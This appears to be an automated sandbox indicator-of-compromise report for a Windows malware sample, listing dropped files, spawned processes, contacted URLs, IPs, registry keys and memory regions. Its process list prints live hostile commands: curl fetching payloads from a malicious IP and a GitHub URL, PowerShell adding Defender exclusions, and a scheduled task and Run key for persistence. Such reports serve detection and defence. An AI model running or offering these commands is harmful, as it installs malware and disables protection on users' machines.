IOC Report
ZOL2mIYAUH.exe

loading gif

Files

File Path
Type
Category
Malicious
ZOL2mIYAUH.exe
PE32 executable (console) Intel 80386, for MS Windows
initial sample
malicious
C:\Users\Public\winnotify.scr
PE32 executable (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\Users\gbcd\ddd.scr
PE32+ executable (GUI) x86-64, for MS Windows
dropped
malicious
C:\Users\gbcd\fff.scr
PE32 executable (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\Users\gbcd\qqq.scr
PE32 executable (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\Users\gbcd\srtware.exe
PE32+ executable (console) x86-64, for MS Windows
dropped
malicious
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\fff.scr.log
ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\winnotify.scr.log
ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
data
modified
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0e1vrb2h.sjr.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0hmbazka.220.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2dgfciwj.hbd.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2vp55bia.dte.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3yi5zwfi.5h0.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_b11ftsoy.plq.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dche31rq.lni.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ed0e3l02.oeq.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ewrwyp5n.x2x.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fdmvsyzb.4pa.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_idspgazx.bcl.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_istmp1fy.xbv.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_k4as1qeg.ijg.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lmryakuo.fke.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ngi1ehjn.fxx.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ojceuebg.jo1.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_r3zo0c2a.tp4.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rgtnypgn.awu.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_uidlgze3.pmh.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zq1k4b3s.dwa.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\winnotify.lnk
MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Sat Nov 23 20:41:28 2024, mtime=Sat Nov 23 20:41:28 2024, atime=Sat Nov 23 20:41:28 2024, length=1197056, window=hide
dropped
\Device\ConDrv
ASCII text, with CRLF line terminators
dropped
There are 21 hidden files, click here to show them.

Processes

Path
Cmdline
Malicious
C:\Users\user\Desktop\ZOL2mIYAUH.exe
"C:\Users\user\Desktop\ZOL2mIYAUH.exe"
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell" -NoProfile -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\Users\'"
malicious
C:\Windows\SysWOW64\curl.exe
"curl.exe" -s http://79.110.49.246/didedba/abc -o C:\Users\gbcd\fff.scr
malicious
C:\Windows\SysWOW64\curl.exe
"curl.exe" -s http://79.110.49.246/didedba/dddv -o C:\Users\gbcd\qqq.scr
malicious
C:\Windows\SysWOW64\curl.exe
"curl.exe" -s http://79.110.49.246/didedba/write -o C:\Users\gbcd\ddd.scr
malicious
C:\Windows\SysWOW64\curl.exe
"curl.exe" -s https://raw.githubusercontent.com/huuuuggga/aaaaa1/refs/heads/main/srtware.exe -o C:\Users\gbcd\srtware.exe
malicious
C:\Users\gbcd\fff.scr
"C:\Users\gbcd\fff.scr"
malicious
C:\Users\gbcd\qqq.scr
"C:\Users\gbcd\qqq.scr"
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\gbcd\qqq.scr'
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'qqq.scr'
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Public\winnotify.scr'
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'winnotify.scr'
malicious
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "winnotify" /tr "C:\Users\Public\winnotify.scr"
malicious
C:\Users\Public\winnotify.scr
"C:\Users\Public\winnotify.scr" /S
malicious
C:\Users\Public\winnotify.scr
"C:\Users\Public\winnotify.scr" /S
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c mkdir C:\Users\gbcd
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
There are 18 hidden processes, click here to show them.

URLs

Name
IP
Malicious
http://79.110.49.246/didedba/dddv
79.110.49.246
malicious
http://79.110.49.246/didedba/write
79.110.49.246
malicious
http://79.110.49.246/didedba/abc
79.110.49.246
malicious
79.110.49.246
malicious
http://79.110.49.246/didedba/dddvK
unknown
http://79.110.49.246/didedba/writes
unknown
https://duckduckgo.com/chrome_newtab
unknown
https://t.me/
unknown
https://duckduckgo.com/ac/?q=
unknown
http://79.110.49.246/didedba/write-oC:
unknown
http://get.geojs.iod
unknown
https://contoso.com/License
unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
unknown
http://79.110.49.246/didedba/dddveW
unknown
http://get.geojs.io
unknown
http://79.110.49.246/didedba/dddvc
unknown
https://aka.ms/pscore6lB
unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
unknown
https://contoso.com/
unknown
https://get.geojs.io
unknown
https://nuget.org/nuget.exe
unknown
http://scripts.sil.org/OFLCopyright
unknown
https://get.geoj8
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
http://79.110.49.246/didedba/dddveo
unknown
https://raw.githubusercontent.com/huuuuggga/aaaaa1/refs/heads/main/srtware.exej
unknown
http://79.110.49.246/didedba/dddves
unknown
https://raw.githubusercontent.com/huuuuggga/aaaaa1/refs/heads/main/srtware.exeYv
unknown
http://nuget.org/NuGet.exe
unknown
https://t.me/freakcodingspot
unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico
unknown
http://pesterbdd.com/images/Pester.png
unknown
http://schemas.xmlsoap.org/soap/encoding/
unknown
http://www.apache.org/licenses/LICENSE-2.0.html
unknown
https://t.me/TheDyer
unknown
https://contoso.com/Icon
unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
unknown
http://79.110.49.246/didedba/abcn
unknown
https://www.ecosia.org/newtab/
unknown
http://79.110.49.246/didedba/abck0
unknown
https://github.com/Pester/Pester
unknown
http://79.110.49.246/didedba/abce
unknown
http://79.110.49.246/didedba/abccej
unknown
https://ac.ecosia.org/autocomplete?q=
unknown
http://www.typoland.com/)
unknown
http://79.110.49.246/didedba/abc-oC:
unknown
http://crl.micro
unknown
https://go.micr
unknown
http://79.110.49.246/didedba/abck$
unknown
http://schemas.xmlsoap.org/wsdl/
unknown
http://79.110.49.246/didedba/dddv32
unknown
http://79.110.49.246/didedba/dddvce
unknown
http://scripts.sil.org/OFL).http://www.typoland.com/designers/Lukasz_Dziedzic/http://www.typoland.co
unknown
https://get.geojs.io/v1/ip/geo.json
104.26.0.100
https://raw.githubusercontent.com/huuuuggga/aaaaa1/refs/heads/main/srtware.exe
185.199.109.133
http://www.enigmaprotector.com/
unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
unknown
http://79.110.49.246/didedba/dddv-oC:
unknown
https://raw.githubusercontent.com/huuuuggga/aaaaa1/refs/heads/main/srtware.exe-oC:
unknown
https://t.me/webster480
unknown
http://crl.micros
unknown
There are 51 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
raw.githubusercontent.com
185.199.109.133
get.geojs.io
104.26.0.100

IPs

IP
Domain
Country
Malicious
79.110.49.246
unknown
Germany
malicious
185.199.109.133
raw.githubusercontent.com
Netherlands
127.0.0.1
unknown
unknown
104.26.0.100
get.geojs.io
United States

Registry

Path
Value
Malicious
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
winnotify
malicious
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\fff_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\fff_RASAPI32
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\fff_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\fff_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\fff_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\fff_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\fff_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\fff_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\fff_RASMANCS
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\fff_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\fff_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\fff_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\fff_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\fff_RASMANCS
FileDirectory
There are 6 hidden registries, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
A52000
unkown
page execute and read and write
malicious
5107000
trusted library allocation
page read and write
malicious
5352000
trusted library allocation
page read and write
malicious
618A000
trusted library allocation
page read and write
malicious
50EF000
trusted library allocation
page read and write
malicious
60D7000
trusted library allocation
page read and write
malicious
5273000
trusted library allocation
page read and write
malicious
5129000
trusted library allocation
page read and write
malicious
5101000
trusted library allocation
page read and write
malicious
528D000
trusted library allocation
page read and write
malicious
4C52000
trusted library allocation
page read and write
malicious
6227000
trusted library allocation
page read and write
malicious
511F000
trusted library allocation
page read and write
malicious
534E000
trusted library allocation
page read and write
malicious
632A000
trusted library allocation
page read and write
malicious
452000
unkown
page execute and read and write
malicious
1C2000
unkown
page execute and read and write
malicious
50D9000
trusted library allocation
page read and write
malicious
5963000
trusted library allocation
page read and write
4A8E000
stack
page read and write
4D5B000
trusted library allocation
page read and write
33F5000
heap
page read and write
7830000
trusted library allocation
page read and write
29B7000
stack
page read and write
293E000
stack
page read and write
8A30000
trusted library allocation
page read and write
8A34000
heap
page read and write
32C0000
trusted library allocation
page read and write
45E0000
trusted library allocation
page execute and read and write
5C41000
trusted library allocation
page read and write
72AE000
stack
page read and write
76EE000
stack
page read and write
6CE0000
trusted library allocation
page read and write
77A0000
trusted library allocation
page read and write
2FD0000
direct allocation
page execute and read and write
8150000
trusted library allocation
page read and write
384E000
stack
page read and write
726000
unkown
page execute and read and write
2FBD000
trusted library allocation
page execute and read and write
766E000
stack
page read and write
494E000
stack
page read and write
766F000
stack
page read and write
75F0000
trusted library allocation
page execute and read and write
45F0000
heap
page read and write
29BD000
stack
page read and write
4D0000
heap
page read and write
1C0000
unkown
page readonly
7140000
trusted library allocation
page read and write
72BE000
stack
page read and write
33FD000
heap
page read and write
413E000
stack
page read and write
494B000
trusted library allocation
page execute and read and write
30E1000
direct allocation
page execute and read and write
239000
unkown
page execute and read and write
39AE000
stack
page read and write
E1A000
heap
page read and write
DDA000
heap
page read and write
3710000
trusted library allocation
page read and write
343F000
stack
page read and write
75A0000
trusted library allocation
page read and write
4DD0000
trusted library allocation
page execute and read and write
7780000
trusted library allocation
page read and write
5692000
trusted library allocation
page read and write
2A53000
direct allocation
page execute and read and write
32C6000
heap
page read and write
834F000
stack
page read and write
81C4000
heap
page read and write
7DFF000
stack
page read and write
73CAD000
unkown
page read and write
970E000
stack
page read and write
78D0000
heap
page read and write
5EA000
unkown
page execute and read and write
8FE5000
heap
page read and write
5111000
trusted library allocation
page read and write
69CB000
stack
page read and write
673E000
stack
page read and write
7414000
heap
page read and write
85E2000
trusted library allocation
page read and write
8AE8000
heap
page read and write
54F000
unkown
page execute and read and write
BDC000
unkown
page execute and read and write
884F000
heap
page read and write
4F46000
trusted library allocation
page read and write
8E20000
trusted library allocation
page read and write
2E60000
heap
page read and write
2DCD000
stack
page read and write
470E000
stack
page read and write
465F000
stack
page read and write
3440000
unclassified section
page read and write
2B6F000
heap
page read and write
2C1E000
stack
page read and write
44E000
stack
page read and write
2BBE000
stack
page read and write
8469000
heap
page read and write
787000
unkown
page execute and read and write
2BC0000
heap
page read and write
8210000
trusted library allocation
page read and write
A50000
unkown
page readonly
2E00000
heap
page read and write
19E000
stack
page read and write
7F69000
trusted library allocation
page read and write
32DA000
trusted library allocation
page execute and read and write
35DF000
stack
page read and write
71DE000
stack
page read and write
30E9000
heap
page read and write
5D6A000
trusted library allocation
page read and write
7BD0000
trusted library allocation
page read and write
2730000
heap
page read and write
2E63000
heap
page read and write
2F6E000
stack
page read and write
2CC0000
trusted library allocation
page read and write
2FE0000
direct allocation
page execute and read and write
7100000
heap
page read and write
2FC9000
trusted library allocation
page read and write
8C23000
trusted library allocation
page read and write
820A000
trusted library allocation
page read and write
7E80000
heap
page read and write
53AA000
trusted library allocation
page read and write
32E0000
trusted library allocation
page read and write
4CA5000
heap
page execute and read and write
4E6E000
stack
page read and write
7E00000
trusted library allocation
page read and write
7E50000
trusted library allocation
page read and write
3360000
heap
page read and write
33B7000
heap
page read and write
3210000
trusted library section
page read and write
676000
heap
page read and write
3B9E000
stack
page read and write
3CDE000
stack
page read and write
885D000
trusted library allocation
page read and write
452000
unkown
page execute and read and write
83F8000
heap
page read and write
2CD3000
trusted library allocation
page execute and read and write
3420000
heap
page read and write
720D000
stack
page read and write
4D56000
trusted library allocation
page read and write
74E8000
heap
page read and write
465E000
stack
page read and write
33DE000
stack
page read and write
7C10000
trusted library allocation
page read and write
5D09000
trusted library allocation
page read and write
3E6E000
stack
page read and write
A7EE000
stack
page read and write
8A2F000
trusted library allocation
page read and write
458E000
stack
page read and write
3170000
heap
page read and write
71CE000
stack
page read and write
960000
heap
page read and write
533000
unkown
page execute and read and write
8F0F000
stack
page read and write
2DAE000
stack
page read and write
7150000
trusted library allocation
page read and write
756E000
stack
page read and write
7A6D000
stack
page read and write
50D5000
trusted library allocation
page read and write
74DE000
stack
page read and write
83E000
stack
page read and write
3070000
heap
page read and write
72F3000
trusted library allocation
page read and write
6F9E000
stack
page read and write
7B90000
trusted library allocation
page read and write
947E000
stack
page read and write
8F3D000
stack
page read and write
28DE000
stack
page read and write
7A02000
heap
page read and write
4E5D000
trusted library allocation
page execute and read and write
4E56000
trusted library allocation
page read and write
126C000
heap
page read and write
8810000
heap
page read and write
5263000
trusted library allocation
page read and write
73DE000
stack
page read and write
2CD4000
trusted library allocation
page read and write
7540000
trusted library allocation
page read and write
7C7A000
trusted library allocation
page read and write
1340000
heap
page read and write
733E000
stack
page read and write
1E8000
unkown
page execute and read and write
893A000
trusted library allocation
page read and write
7DDF000
heap
page read and write
3103000
direct allocation
page execute and read and write
2ADA000
heap
page read and write
783E000
stack
page read and write
4F30000
trusted library allocation
page execute and read and write
2922000
trusted library allocation
page read and write
880000
heap
page read and write
445E000
stack
page read and write
712000
unkown
page execute and read and write
2D77000
heap
page read and write
2B15000
heap
page read and write
748B000
heap
page read and write
677E000
stack
page read and write
556A000
trusted library allocation
page read and write
5CF000
unkown
page execute and read and write
6D3E000
stack
page read and write
7C2D000
stack
page read and write
4950000
direct allocation
page read and write
A3DF000
stack
page read and write
2DCE000
stack
page read and write
8E4E000
stack
page read and write
4960000
trusted library allocation
page read and write
277E000
unkown
page read and write
50F0000
trusted library allocation
page execute and read and write
5683000
trusted library allocation
page read and write
5F71000
trusted library allocation
page read and write
4F67000
heap
page read and write
40F0000
trusted library allocation
page read and write
4C3E000
stack
page read and write
5EA7000
trusted library allocation
page read and write
E8A000
heap
page read and write
46DE000
stack
page read and write
739E000
stack
page read and write
741A000
heap
page read and write
6F4A000
stack
page read and write
2CE0000
heap
page read and write
89A2000
trusted library allocation
page read and write
54B7000
trusted library allocation
page read and write
30E3000
heap
page read and write
13A6000
heap
page read and write
2D70000
heap
page read and write
4516000
trusted library allocation
page read and write
7D54000
heap
page read and write
8780000
trusted library allocation
page read and write
4D0C000
trusted library allocation
page read and write
2FDA000
trusted library allocation
page execute and read and write
4BA8000
trusted library allocation
page read and write
739E000
stack
page read and write
4ECC000
stack
page read and write
7B70000
heap
page read and write
78B0000
trusted library allocation
page execute and read and write
8A3C000
heap
page read and write
32E5000
trusted library allocation
page execute and read and write
4DF000
unkown
page execute and read and write
77E0000
trusted library allocation
page read and write
469E000
stack
page read and write
5942000
trusted library allocation
page read and write
82B0000
heap
page read and write
88E1000
heap
page read and write
8F86000
heap
page read and write
50F0000
heap
page execute and read and write
519F000
trusted library allocation
page read and write
2D8E000
stack
page read and write
3105000
heap
page read and write
4FA4000
trusted library allocation
page read and write
3E1E000
stack
page read and write
7B7E000
heap
page read and write
2A17000
heap
page read and write
7B70000
heap
page read and write
4CA0000
heap
page execute and read and write
7E1D000
heap
page read and write
4F5000
heap
page read and write
155A000
heap
page read and write
4E90000
trusted library allocation
page read and write
3105000
heap
page read and write
455E000
stack
page read and write
2AFA000
heap
page read and write
5CA000
unkown
page execute and read and write
526E000
trusted library allocation
page read and write
7C80000
trusted library allocation
page read and write
77AE000
stack
page read and write
5E0000
heap
page read and write
DD0000
heap
page read and write
1340000
heap
page read and write
2CE3000
heap
page read and write
7DC3000
heap
page read and write
8860000
trusted library allocation
page read and write
5D01000
trusted library allocation
page read and write
4770000
heap
page execute and read and write
6F5E000
stack
page read and write
4F5000
heap
page read and write
2ADA000
heap
page read and write
47A0000
heap
page read and write
70C0000
trusted library allocation
page execute and read and write
4F90000
trusted library allocation
page execute and read and write
7C6E000
stack
page read and write
2F87000
heap
page read and write
3BDF000
stack
page read and write
4906000
trusted library allocation
page read and write
7FF6000
trusted library allocation
page read and write
2CBE000
stack
page read and write
89C0000
trusted library allocation
page execute and read and write
4A90000
direct allocation
page read and write
4F51000
trusted library allocation
page read and write
4DDE000
stack
page read and write
8630000
heap
page read and write
223000
unkown
page execute and read and write
8895000
heap
page read and write
65F000
unkown
page execute and read and write
7BB0000
heap
page read and write
836C000
heap
page read and write
3030000
heap
page read and write
6FD0000
heap
page read and write
2A60000
direct allocation
page execute and read and write
444E000
stack
page read and write
4C41000
trusted library allocation
page read and write
4660000
trusted library allocation
page read and write
51DB000
trusted library allocation
page read and write
2C5F000
stack
page read and write
A50000
unkown
page readonly
15B4000
heap
page read and write
2E67000
heap
page read and write
7DE8000
heap
page read and write
1313000
heap
page read and write
6DFE000
stack
page read and write
7C70000
trusted library allocation
page read and write
75CE000
stack
page read and write
6163000
trusted library allocation
page read and write
885000
heap
page read and write
12F7000
stack
page read and write
6E0E000
stack
page read and write
8DDE000
stack
page read and write
2F90000
direct allocation
page execute and read and write
56F6000
trusted library allocation
page read and write
764A000
trusted library allocation
page read and write
15B2000
heap
page read and write
2DD0000
heap
page read and write
314C000
heap
page read and write
2BC7000
heap
page read and write
8370000
trusted library allocation
page read and write
73EE000
heap
page read and write
4E7B000
trusted library allocation
page execute and read and write
2D2E000
stack
page read and write
3290000
heap
page read and write
8660000
trusted library allocation
page read and write
455E000
stack
page read and write
7660000
heap
page execute and read and write
8A87000
heap
page read and write
7E10000
trusted library allocation
page read and write
82B0000
heap
page read and write
5F79000
trusted library allocation
page read and write
8F4E000
heap
page read and write
7D68000
heap
page read and write
7DA0000
trusted library allocation
page read and write
7620000
trusted library allocation
page read and write
6FCD000
stack
page read and write
3B5E000
stack
page read and write
7554000
heap
page read and write
7C50000
heap
page read and write
7B44000
heap
page read and write
4E30000
trusted library allocation
page read and write
7B4E000
stack
page read and write
513A000
trusted library allocation
page read and write
73CA6000
unkown
page readonly
946E000
stack
page read and write
33EF000
stack
page read and write
2ADA000
heap
page read and write
8A38000
heap
page read and write
123E000
heap
page read and write
9C90000
heap
page read and write
A55E000
heap
page read and write
927F000
stack
page read and write
309E000
stack
page read and write
8660000
trusted library allocation
page read and write
459E000
stack
page read and write
2AC0000
heap
page read and write
28BE000
stack
page read and write
306E000
stack
page read and write
32A8000
heap
page read and write
75ED000
trusted library allocation
page read and write
4947000
trusted library allocation
page execute and read and write
2ED7000
heap
page read and write
2D94000
trusted library allocation
page read and write
1256000
heap
page read and write
8730000
trusted library allocation
page read and write
6100000
trusted library allocation
page read and write
7D22000
trusted library allocation
page read and write
81A3000
heap
page read and write
F8B000
stack
page read and write
56A7000
trusted library allocation
page read and write
30E3000
heap
page read and write
4B8E000
stack
page read and write
3073000
heap
page read and write
4B3E000
stack
page read and write
48DE000
stack
page read and write
7C60000
trusted library allocation
page execute and read and write
35F4000
trusted library allocation
page read and write
2FD0000
trusted library allocation
page read and write
818B000
heap
page read and write
31A0000
heap
page read and write
7542000
heap
page read and write
4FA0000
trusted library allocation
page read and write
5140000
trusted library allocation
page read and write
84A5000
heap
page read and write
4B90000
heap
page execute and read and write
27A0000
heap
page read and write
2E3D000
stack
page read and write
99B000
stack
page read and write
763E000
stack
page read and write
2F2E000
stack
page read and write
56A3000
trusted library allocation
page read and write
498E000
stack
page read and write
745A000
stack
page read and write
8CF000
stack
page read and write
8F8F000
heap
page read and write
8A28000
heap
page read and write
76F0000
trusted library allocation
page read and write
5E8000
heap
page read and write
82CC000
heap
page read and write
7D64000
heap
page read and write
3080000
heap
page read and write
433E000
stack
page read and write
4C0000
unkown
page readonly
35F0000
trusted library allocation
page read and write
7CEF000
stack
page read and write
72F5000
trusted library allocation
page read and write
2CFE000
stack
page read and write
8910000
heap
page read and write
4910000
trusted library allocation
page read and write
86EF000
stack
page read and write
8ABC000
heap
page read and write
684000
unkown
page execute and read and write
87B0000
trusted library allocation
page execute and read and write
762D000
stack
page read and write
834D000
stack
page read and write
50C7000
trusted library allocation
page read and write
E21000
heap
page read and write
3050000
heap
page read and write
70E0000
trusted library allocation
page read and write
6A00000
unclassified section
page read and write
32BD000
trusted library allocation
page execute and read and write
7430000
heap
page execute and read and write
8720000
trusted library allocation
page execute and read and write
46CE000
stack
page read and write
81CE000
heap
page read and write
2DF8000
heap
page read and write
3ADF000
stack
page read and write
14E0000
heap
page read and write
40CE000
stack
page read and write
2F80000
heap
page read and write
4924000
trusted library allocation
page read and write
56F5000
trusted library allocation
page read and write
432E000
stack
page read and write
4DC0000
heap
page readonly
3BEE000
stack
page read and write
7566000
heap
page read and write
750D000
stack
page read and write
CF0000
heap
page read and write
2ED8000
heap
page read and write
17CE000
stack
page read and write
4F84000
trusted library allocation
page read and write
3106000
heap
page read and write
3EAE000
stack
page read and write
83F0000
heap
page read and write
2B9E000
stack
page read and write
4DCE000
trusted library allocation
page read and write
8190000
trusted library allocation
page execute and read and write
76EE000
stack
page read and write
563A000
trusted library allocation
page read and write
72FF000
stack
page read and write
8240000
trusted library allocation
page read and write
4DB0000
trusted library allocation
page read and write
776E000
stack
page read and write
4750000
trusted library allocation
page read and write
7DEF000
heap
page read and write
2D20000
heap
page read and write
4D95000
trusted library allocation
page execute and read and write
5502000
trusted library allocation
page read and write
8163000
trusted library allocation
page read and write
796000
unkown
page execute and write copy
8940000
trusted library allocation
page read and write
400000
heap
page read and write
3127000
heap
page read and write
73FC000
heap
page read and write
4740000
trusted library allocation
page execute and read and write
84E0000
trusted library allocation
page read and write
865D000
trusted library allocation
page read and write
75C6000
heap
page read and write
68A000
stack
page read and write
881E000
stack
page read and write
75ED000
stack
page read and write
FF0D0000
trusted library allocation
page execute and read and write
41DE000
stack
page read and write
8379000
heap
page read and write
7AE0000
heap
page read and write
534D000
trusted library allocation
page read and write
82CB000
stack
page read and write
DDE000
heap
page read and write
4BDF000
trusted library allocation
page read and write
513E000
trusted library allocation
page read and write
2980000
direct allocation
page execute and read and write
484E000
stack
page read and write
886B000
heap
page read and write
47B1000
trusted library allocation
page read and write
5563000
trusted library allocation
page read and write
5143000
trusted library allocation
page read and write
4940000
trusted library allocation
page read and write
469D000
stack
page read and write
60F1000
trusted library allocation
page read and write
8830000
heap
page read and write
7BB0000
trusted library allocation
page read and write
D2C000
unkown
page execute and read and write
28E0000
trusted library allocation
page read and write
6D00000
heap
page read and write
2CB5000
heap
page read and write
7C0D000
stack
page read and write
470E000
stack
page read and write
7630000
trusted library allocation
page read and write
5573000
trusted library allocation
page read and write
8A62000
heap
page read and write
4F50000
trusted library allocation
page read and write
41CE000
stack
page read and write
5A6000
unkown
page execute and read and write
4F1C000
stack
page read and write
13DE000
heap
page read and write
2E70000
direct allocation
page execute and read and write
7D60000
heap
page read and write
4AB0000
trusted library allocation
page read and write
8380000
trusted library allocation
page read and write
E00000
heap
page read and write
8F60000
heap
page read and write
7AAC000
stack
page read and write
882A000
heap
page read and write
95C0000
trusted library allocation
page read and write
2DD0000
heap
page read and write
81B2000
heap
page read and write
847E000
heap
page read and write
2FB4000
trusted library allocation
page read and write
42DF000
stack
page read and write
2E0E000
stack
page read and write
405F000
stack
page read and write
2B6F000
heap
page read and write
33AA000
heap
page read and write
4F30000
trusted library allocation
page read and write
2F8C000
stack
page read and write
2BA0000
unclassified section
page read and write
8170000
trusted library allocation
page read and write
35A000
unkown
page execute and read and write
4F5000
heap
page read and write
87DE000
stack
page read and write
92AE000
stack
page read and write
632000
unkown
page execute and read and write
589C000
trusted library allocation
page read and write
7439000
heap
page read and write
86AE000
stack
page read and write
2D40000
heap
page read and write
30D0000
heap
page read and write
3F1E000
stack
page read and write
6C69000
stack
page read and write
4E5C000
trusted library allocation
page read and write
1391000
heap
page read and write
7D6C000
heap
page read and write
6F8E000
stack
page read and write
30EA000
heap
page read and write
2FC3000
direct allocation
page execute and read and write
69FE000
stack
page read and write
7591000
heap
page read and write
730E000
stack
page read and write
4F67000
trusted library allocation
page execute and read and write
3BCE000
stack
page read and write
444E000
stack
page read and write
6178000
trusted library allocation
page read and write
4A8E000
stack
page read and write
4680000
trusted library allocation
page read and write
8710000
heap
page read and write
616A000
trusted library allocation
page read and write
